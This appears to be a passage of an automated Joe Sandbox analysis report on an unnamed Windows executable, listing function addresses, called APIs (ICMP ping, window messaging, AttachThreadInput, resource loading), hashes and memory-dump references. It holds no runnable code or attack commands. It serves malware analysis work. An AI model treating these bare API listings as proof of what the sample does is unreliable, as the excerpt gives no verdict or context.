                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007B87C4
                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007B87DA
                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007B884F
                                                                                                                                        • WSACleanup.WS2_32 ref: 007B8855
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                        • String ID: Ping
                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                        • Opcode ID: cc63932dfe9034542ce5691995970ebcd1e452e2eead5d205ef21d7bdfc01c5f
                                                                                                                                        • Instruction ID: 6144a174bef36b2519f657ca69de44d0788a64299e8dd36daa291398c479be16
                                                                                                                                        • Opcode Fuzzy Hash: cc63932dfe9034542ce5691995970ebcd1e452e2eead5d205ef21d7bdfc01c5f
                                                                                                                                        • Instruction Fuzzy Hash: 9B517231604201DFD761AF64CD89BAA7BE8AF48724F148529F956DB2A1DF78EC01CB42
                                                                                                                                        Function 007C9C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007C9C68
                                                                                                                                        • CreateMenu.USER32 ref: 007C9C83
                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 007C9C92
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C9D1F
                                                                                                                                        • IsMenu.USER32(?), ref: 007C9D35
                                                                                                                                        • CreatePopupMenu.USER32 ref: 007C9D3F
                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C9D70
                                                                                                                                        • DrawMenuBar.USER32 ref: 007C9D7E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 176399719-4108050209
                                                                                                                                        • Opcode ID: 053ca043ef3a4279a423aa739ddf38968ce1bfe86b0eced3ad4b617f7697b652
                                                                                                                                        • Instruction ID: 27ac4a30ae18aaec90cfac2882781b819b6e991ada3953df1e32657a497e5df8
                                                                                                                                        • Opcode Fuzzy Hash: 053ca043ef3a4279a423aa739ddf38968ce1bfe86b0eced3ad4b617f7697b652
                                                                                                                                        • Instruction Fuzzy Hash: 7B412875601209EFDB20EF64D888F9ABBB5FF49314F14442CEA46AB251D734A910CBA4
                                                                                                                                        Function 007AEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 007AEC1E
                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007AEC94
                                                                                                                                        • GetLastError.KERNEL32 ref: 007AEC9E
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 007AED0B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                                        • Opcode ID: cc61d03554d8452bb1ffe7b60e575397e000770135ce48752c02b45818ff0260
                                                                                                                                        • Instruction ID: dcbe6bd0a0859614619086973efe8616887a049340ddd2a1c4170d05e0967df8
                                                                                                                                        • Opcode Fuzzy Hash: cc61d03554d8452bb1ffe7b60e575397e000770135ce48752c02b45818ff0260
                                                                                                                                        • Instruction Fuzzy Hash: 17318835A00205DFC711DF68C949EAD77B5FF85710F148115F502EB291DA799E41CBA1
                                                                                                                                        Function 0079C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0079C782
                                                                                                                                        • GetDlgCtrlID.USER32 ref: 0079C78D
                                                                                                                                        • GetParent.USER32 ref: 0079C7A9
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0079C7AC
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0079C7B5
                                                                                                                                        • GetParent.USER32(?), ref: 0079C7D1
                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0079C7D4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                                        • Opcode ID: 000799c517cc56612020cb7c7cd4b5948558b39e0533a83f0edea4a991c9e43c
                                                                                                                                        • Instruction ID: f19f3ea9bfd677163556fbd64a8eea837bf9394c45776b0cfe8d871798e6324d
                                                                                                                                        • Opcode Fuzzy Hash: 000799c517cc56612020cb7c7cd4b5948558b39e0533a83f0edea4a991c9e43c
                                                                                                                                        • Instruction Fuzzy Hash: 3821AC74A00208ABCF05EBA0DC85EBEBB79EF49340F104115F962972E1DB7C5815AB20
                                                                                                                                        Function 0079C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0079C869
                                                                                                                                        • GetDlgCtrlID.USER32 ref: 0079C874
                                                                                                                                        • GetParent.USER32 ref: 0079C890
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0079C893
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0079C89C
                                                                                                                                        • GetParent.USER32(?), ref: 0079C8B8
                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0079C8BB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                                        • Opcode ID: 931ab1b5f209bd83b97f6ccb681c13b285427098ff8d531bffd78a8fa299c95e
                                                                                                                                        • Instruction ID: d0e27fbb18950c9905682eb54e6d63d868a12481e61d7b179771aa42b9a1bf95
                                                                                                                                        • Opcode Fuzzy Hash: 931ab1b5f209bd83b97f6ccb681c13b285427098ff8d531bffd78a8fa299c95e
                                                                                                                                        • Instruction Fuzzy Hash: 5E21AF71A01208ABDF01EBA4DC89EFEBB79EF49300F104115F962E7291DB7D9855EB20
                                                                                                                                        Function 0079C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32 ref: 0079C8D9
                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 0079C8EE
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079C900
                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0079C97B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                        • API String ID: 1704125052-3381328864
                                                                                                                                        • Opcode ID: 3d36388b1667ae41aa44384a454b0a79cb391aeb8eeb802d8a6ec63837bf3ad8
                                                                                                                                        • Instruction ID: 1e01b638e7de9906f86affa45c43f28575bef810050d7957a78ff8606bd04d5e
                                                                                                                                        • Opcode Fuzzy Hash: 3d36388b1667ae41aa44384a454b0a79cb391aeb8eeb802d8a6ec63837bf3ad8
                                                                                                                                        • Instruction Fuzzy Hash: FF11CAB6648302F9FE153B34BC0BCA677ACDF06774B200012F910E91D2FB6D79528654
                                                                                                                                        Function 007AB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 007AB137
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafeVartype
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1725837607-0
                                                                                                                                        • Opcode ID: 75386392bc6f8e9ea13da94b86c57e0bb2b2e0a248125e4d3f49b345267f77a9
                                                                                                                                        • Instruction ID: 2b7fd8b04adc99440cfe3b25e510e20ad7fe4e219b7f45eb6d23b4275d7d9ef1
                                                                                                                                        • Opcode Fuzzy Hash: 75386392bc6f8e9ea13da94b86c57e0bb2b2e0a248125e4d3f49b345267f77a9
                                                                                                                                        • Instruction Fuzzy Hash: 34C19175A0121ADFDF00CF98C495BAEB7F4FF4A315F20416AE615EB282C738A941CB90
                                                                                                                                        Function 0078BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __lock.LIBCMT ref: 0078BA74
                                                                                                                                          • Part of subcall function 00788984: __mtinitlocknum.LIBCMT ref: 00788996
                                                                                                                                          • Part of subcall function 00788984: RtlEnterCriticalSection.NTDLL(00780127), ref: 007889AF
                                                                                                                                        • __calloc_crt.LIBCMT ref: 0078BA85
                                                                                                                                          • Part of subcall function 00787616: __calloc_impl.LIBCMT ref: 00787625
                                                                                                                                          • Part of subcall function 00787616: Sleep.KERNEL32(00000000,?,00780127,?,0076125D,00000058,?,?), ref: 0078763C
                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0078BAA0
                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00816990,00000064,00786B14,008167D8,00000014), ref: 0078BAF9
                                                                                                                                        • __calloc_crt.LIBCMT ref: 0078BB44
                                                                                                                                        • GetFileType.KERNEL32(00000001), ref: 0078BB8B
                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0078BBC4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1426640281-0
                                                                                                                                        • Opcode ID: a3c9691d652717d997eb4876ef40e91bc5a4679a1be3ec6ad173610c25e17bc2
                                                                                                                                        • Instruction ID: a390fe451e431dc36f93bc19b479a9dc1a7edeff5acc8c9d16267d61a7aa4499
                                                                                                                                        • Opcode Fuzzy Hash: a3c9691d652717d997eb4876ef40e91bc5a4679a1be3ec6ad173610c25e17bc2
                                                                                                                                        • Instruction Fuzzy Hash: DE81E470945745CFDB24EF68C8846A9BBF0BF09324B24825DD4A6AB3D1DB389843CB65
                                                                                                                                        Function 007A7212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __swprintf.LIBCMT ref: 007A7226
                                                                                                                                        • __swprintf.LIBCMT ref: 007A7233
                                                                                                                                          • Part of subcall function 0078234B: __woutput_l.LIBCMT ref: 007823A4
                                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 007A725D
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 007A7269
                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 007A7276
                                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 007A7296
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 007A72A8
                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 007A72B7
                                                                                                                                        • LockResource.KERNEL32(?), ref: 007A72C3
                                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007A7322
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1433390588-0
                                                                                                                                        • Opcode ID: 4e7e3f014b9d02bd44916ea7d8866c01d1427daa4fabbfedfbbe6e6fc57c6076
                                                                                                                                        • Instruction ID: 28e5990a9419fb81e5365cfc19ba9f9bca0c7a42916cb52f60edfdde48329b31
                                                                                                                                        • Opcode Fuzzy Hash: 4e7e3f014b9d02bd44916ea7d8866c01d1427daa4fabbfedfbbe6e6fc57c6076
                                                                                                                                        • Instruction Fuzzy Hash: 1A310FB1A0429AABCF249F60DC88AAF7BBCFF49301F108525FD01D6190E738D911DBA4
                                                                                                                                        Function 007A4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 007A4A7D
                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4A91
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 007A4A98
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4AA7
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 007A4AB9
                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4AD2
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4AE4
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4B29
                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4B3E
                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4B49
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                        • Opcode ID: f25840d3d5651421bdb1809668b2c46103b641bbb6b322e757bba50de74e3670
                                                                                                                                        • Instruction ID: 96e592f547cb55d00eaaec080427ebe28c914ef88a1ef4cdd7e94c2d85b51eee
                                                                                                                                        • Opcode Fuzzy Hash: f25840d3d5651421bdb1809668b2c46103b641bbb6b322e757bba50de74e3670
                                                                                                                                        • Instruction Fuzzy Hash: C031ACB5600204EFDB209B14DC88B6AB7AABBC6352F11C105F904CB1A0D3FEDE458B68
                                                                                                                                        Function 007DEC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetClientRect.USER32(?), ref: 007DEC32
                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 007DEC49
                                                                                                                                        • GetWindowDC.USER32(?), ref: 007DEC55
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 007DEC64
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 007DEC76
                                                                                                                                        • GetSysColor.USER32(00000005), ref: 007DEC94
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 272304278-0
                                                                                                                                        • Opcode ID: 8cfb19991e00011cf45df19811069d82f629a3618e4d2ad048a310b00ff568cb
                                                                                                                                        • Instruction ID: 739d405e9523a9c1d5a886c555174643a92c1c7e075b35b13d119655c5324db9
                                                                                                                                        • Opcode Fuzzy Hash: 8cfb19991e00011cf45df19811069d82f629a3618e4d2ad048a310b00ff568cb
                                                                                                                                        • Instruction Fuzzy Hash: A3215E31501248EFDB316B64EC88BA97B71FB09365F108125FA2A991E1DB390D51DF21
                                                                                                                                        Function 0079D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnumChildWindows.USER32(?,0079DD46), ref: 0079DC86
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
